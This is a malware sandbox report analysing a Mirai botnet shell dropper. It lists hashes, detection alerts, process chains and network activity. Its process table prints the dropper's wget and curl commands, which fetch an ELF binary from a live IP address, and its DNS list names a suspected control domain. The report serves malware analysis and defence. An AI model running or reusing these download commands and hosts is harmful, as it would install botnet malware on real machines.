File name: huawei.sh
Full analysis: https://app.any.run/tasks/b308519e-63a5-46e7-8fdc-bd32ecedb842
Verdict: Malicious activity
Threats:

A botnet is a group of internet-connected devices that are controlled by a single individual or group, often without the knowledge or consent of the device owners. These devices can be used to launch a variety of malicious attacks, such as distributed denial-of-service (DDoS) attacks, spam campaigns, and data theft. Botnet malware is the software that is used to infect devices and turn them into part of a botnet.

Analysis date: September 23, 2024, 08:44:29
OS: Ubuntu 22.04.2
Tags: mirai, botnet
Indicators:
MIME: text/x-shellscript
File info: Bourne-Again shell script, ASCII text executable
MD5: DF9D36B5977AB239408D11C6E3453C7B
SHA1: 60E7EA940BC51A0AA5D9D0425B3E6312C6C85221
SHA256: 9085AFD2289868B0662BE095EB5746BAA756C7774042867E42381CC3983C0D37
SSDEEP: 24:vpSVeSV6pS7S0ppS3CS3apSUSMpSZSgDpSZCSZcpSTSMpSddSdU9pSCSqpS6SMJ+:vIr6GqVa1AVeS9bDIss

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • MIRAI has been detected (SURICATA)

      • wget (PID: 13954)
  • SUSPICIOUS

    • Reads /proc/mounts (likely used to find writable filesystems)

      • curl (PID: 13955)
      • curl (PID: 14226)
      • curl (PID: 14255)
      • curl (PID: 14285)
      • check-new-release-gtk (PID: 14326)
    • Uses wget to download content

      • huawei.sh (PID: 13916)
    • Modifies file or directory owner

      • sudo (PID: 13912)
    • Manipulating modules (likely to execute programs on system boot)

      • modprobe (PID: 13985)
      • modprobe (PID: 14016)
      • modprobe (PID: 14044)
      • modprobe (PID: 14074)
      • modprobe (PID: 14104)
      • modprobe (PID: 14134)
      • modprobe (PID: 14165)
      • modprobe (PID: 14253)
      • modprobe (PID: 14224)
      • modprobe (PID: 14196)
      • modprobe (PID: 14312)
      • modprobe (PID: 14283)
    • Potential Corporate Privacy Violation

      • wget (PID: 13918)
      • wget (PID: 13954)
      • wget (PID: 13986)
      • curl (PID: 13955)
      • wget (PID: 14105)
      • wget (PID: 14135)
      • wget (PID: 14045)
      • wget (PID: 14017)
      • wget (PID: 14075)
      • wget (PID: 14254)
      • curl (PID: 14255)
      • wget (PID: 14166)
      • wget (PID: 14197)
    • Connects to unusual port

      • wget (PID: 13918)
      • wget (PID: 13954)
      • wget (PID: 14045)
      • wget (PID: 14075)
      • curl (PID: 13955)
      • wget (PID: 13986)
      • wget (PID: 14017)
      • curl (PID: 14226)
      • wget (PID: 14166)
      • wget (PID: 14197)
      • wget (PID: 14225)
      • wget (PID: 14254)
      • curl (PID: 14255)
      • wget (PID: 14284)
      • curl (PID: 14285)
      • wget (PID: 14105)
      • wget (PID: 14135)
      • WTH (PID: 13952)
    • Executes commands using command-line interpreter

      • update-notifier (PID: 14324)
  • INFO

    No info indicators.
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
All screenshots are available in the full report
Total processes: 356
Monitored processes: 138
Malicious processes: 3
Suspicious processes: 1

Behavior graph (process chain flattened from the interactive graph; "no specs" is the report's marker for processes with no triggered indicators)

start sh no specs sudo no specs chown no specs chmod no specs sudo no specs huawei.sh no specs locale-check no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs systemctl no specs cat no specs chmod no specs wth no specs #MIRAI wget wth curl wth no specs systemctl no specs snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget systemctl no specs snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs systemctl no specs cat no specs chmod no specs bash no specs modprobe no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget snap no specs snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget curl snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget curl snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs wget curl snap-seccomp no specs snap-confine no specs snap-confine no specs cat no specs chmod no specs bash no specs modprobe no specs update-notifier no specs sh no specs check-new-release-gtk dpkg no specs dpkg no specs lsb_release no specs lsb_release no specs lsb_release no specs lsb_release no specs

Process information

PID | CMD | Path | Parent process | User | Integrity Level | Exit code
13911 | /bin/sh -c "sudo chown user /home/user/Desktop/huawei\.sh && chmod +x /home/user/Desktop/huawei\.sh && DISPLAY=:0 sudo -iu user /home/user/Desktop/huawei\.sh " | /bin/sh | any-guest-agent | user | UNKNOWN | 14106
13912 | sudo chown user /home/user/Desktop/huawei.sh | /usr/bin/sudo | sh | user | UNKNOWN | 0
13913 | chown user /home/user/Desktop/huawei.sh | /usr/bin/chown | sudo | root | UNKNOWN | 0
13914 | chmod +x /home/user/Desktop/huawei.sh | /usr/bin/chmod | sh | user | UNKNOWN | 0
13915 | sudo -iu user /home/user/Desktop/huawei.sh | /usr/bin/sudo | sh | user | UNKNOWN | 14076
13916 | /bin/bash /home/user/Desktop/huawei.sh | /home/user/Desktop/huawei.sh | sudo | user | UNKNOWN | 14096
13917 | /usr/bin/locale-check C.UTF-8 | /usr/bin/locale-check | huawei.sh | user | UNKNOWN | 0
13918 | wget http://154.216.18.230:85/zmap.x86 | /usr/bin/wget | huawei.sh | user | UNKNOWN | 0
13919 | curl -O http://154.216.18.230:85/zmap.x86 | /snap/snapd/current/usr/bin/snap | huawei.sh | user | UNKNOWN | 485
13933 | /snap/snapd/20290/usr/lib/snapd/snap-seccomp version-info | /snap/snapd/20290/usr/lib/snapd/snap-seccomp | snap | user | UNKNOWN | 13912
Executable files: 0
Suspicious files: 1
Text files: 8
Unknown types: 0

Dropped files (no MD5/SHA256 values are given in the report for these entries)

PID | Process | Filename | Type
13918 | wget | /tmp/zmap.x86 | binary
14326 | check-new-release-gtk | /tmp/#6030006 (deleted) | text
14326 | check-new-release-gtk | /tmp/#6030007 (deleted) | text
14326 | check-new-release-gtk | /tmp/#6030008 (deleted) | text
14326 | check-new-release-gtk | /tmp/#6030009 (deleted) | text
14326 | check-new-release-gtk | /tmp/#6030010 (deleted) | text
14326 | check-new-release-gtk | /tmp/#6030011 (deleted) | text
14326 | check-new-release-gtk | /tmp/#6030012 (deleted) | text
14326 | check-new-release-gtk | /tmp/#6030013 (deleted) | text
HTTP(S) requests: 68
TCP/UDP connections: 49
DNS requests: 31
Threats: 69

HTTP requests (PID and Process columns are empty in the report for all rows)

Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
GET | 204 | 91.189.91.96:80 | http://connectivity-check.ubuntu.com/ | unknown | | | whitelisted
GET | | 91.189.91.98:80 | http://connectivity-check.ubuntu.com/ | unknown | | | whitelisted
GET | | 91.189.91.98:80 | http://connectivity-check.ubuntu.com/ | unknown | | | whitelisted
POST | | 185.125.188.59:443 | https://api.snapcraft.io/v2/snaps/refresh | unknown | | |
POST | | 185.125.188.58:443 | https://api.snapcraft.io/v2/snaps/refresh | unknown | | |
POST | | 185.125.188.59:443 | https://api.snapcraft.io/v2/snaps/refresh | unknown | | |
POST | | 185.125.188.54:443 | https://api.snapcraft.io/v2/snaps/refresh | unknown | | |
POST | 200 | 185.125.188.54:443 | https://api.snapcraft.io/v2/snaps/refresh | unknown | tss | 43.5 Kb |
POST | 200 | 185.125.188.55:443 | https://api.snapcraft.io/v2/snaps/refresh | unknown | tss | 43.5 Kb |
POST | 200 | 185.125.188.59:443 | https://api.snapcraft.io/api/v1/snaps/auth/sessions | unknown | binary | 587 b |

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
| | 91.189.91.98:80 | connectivity-check.ubuntu.com | Canonical Group Limited | US | whitelisted
470 | avahi-daemon | 224.0.0.251:5353 | | | | unknown
| | 37.19.194.80:443 | odrs.gnome.org | Datacamp Limited | DE | whitelisted
| | 169.150.255.183:443 | odrs.gnome.org | | GB | whitelisted
| | 195.181.170.18:443 | odrs.gnome.org | Datacamp Limited | DE | whitelisted
| | 185.125.188.54:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
| | 185.125.188.59:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
| | 185.125.188.58:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
| | 185.125.188.55:443 | api.snapcraft.io | Canonical Group Limited | GB | whitelisted
| | 91.189.91.96:80 | connectivity-check.ubuntu.com | Canonical Group Limited | US | whitelisted

DNS requests (domain, reputation, resolved IPs)

connectivity-check.ubuntu.com (whitelisted)
  • 91.189.91.98
  • 91.189.91.49
  • 91.189.91.96
  • 185.125.190.98
  • 91.189.91.97
  • 185.125.190.49
  • 185.125.190.48
  • 185.125.190.17
  • 185.125.190.97
  • 91.189.91.48
  • 185.125.190.96
  • 185.125.190.18
  • 2620:2d:4000:1::23
  • 2620:2d:4002:1::198
  • 2001:67c:1562::24
  • 2620:2d:4000:1::97
  • 2620:2d:4002:1::197
  • 2620:2d:4000:1::2a
  • 2001:67c:1562::23
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::22
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::2b
  • 2620:2d:4002:1::196
odrs.gnome.org (whitelisted)
  • 37.19.194.80
  • 212.102.56.179
  • 207.211.211.27
  • 195.181.170.18
  • 195.181.175.41
  • 169.150.255.183
  • 169.150.255.180
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::18
api.snapcraft.io (whitelisted)
  • 185.125.188.54
  • 185.125.188.55
  • 185.125.188.58
  • 185.125.188.59
google.com (whitelisted)
  • 216.58.206.46
  • 2a00:1450:4001:82b::200e
fgwe.myvnc.com (unknown; no resolved IP recorded)
193.100.168.192.in-addr.arpa (unknown; no resolved IP recorded)
changelogs.ubuntu.com (whitelisted)
  • 91.189.91.49
  • 185.125.190.17
  • 185.125.190.18
  • 91.189.91.48
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::2a

Threats (rows without a PID/Process are shown that way in the report)

PID | Process | Class | Message
13918 | wget | Potentially Bad Traffic | ET INFO x86 File Download Request from IP Address
| | Potentially Bad Traffic | ET HUNTING curl User-Agent to Dotted Quad
| | Potentially Bad Traffic | ET INFO x86 File Download Request from IP Address
| | Potentially Bad Traffic | ET HUNTING Suspicious GET Request for .x86
13918 | wget | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download
13918 | wget | Potentially Bad Traffic | ET HUNTING Suspicious GET Request for .x86
| | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download
13952 | WTH | Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.myvnc .com
13955 | curl | Potentially Bad Traffic | ET INFO MIPS File Download Request from IP Address
13955 | curl | Potential Corporate Privacy Violation | ET POLICY Executable and linking format (ELF) file download
No debug info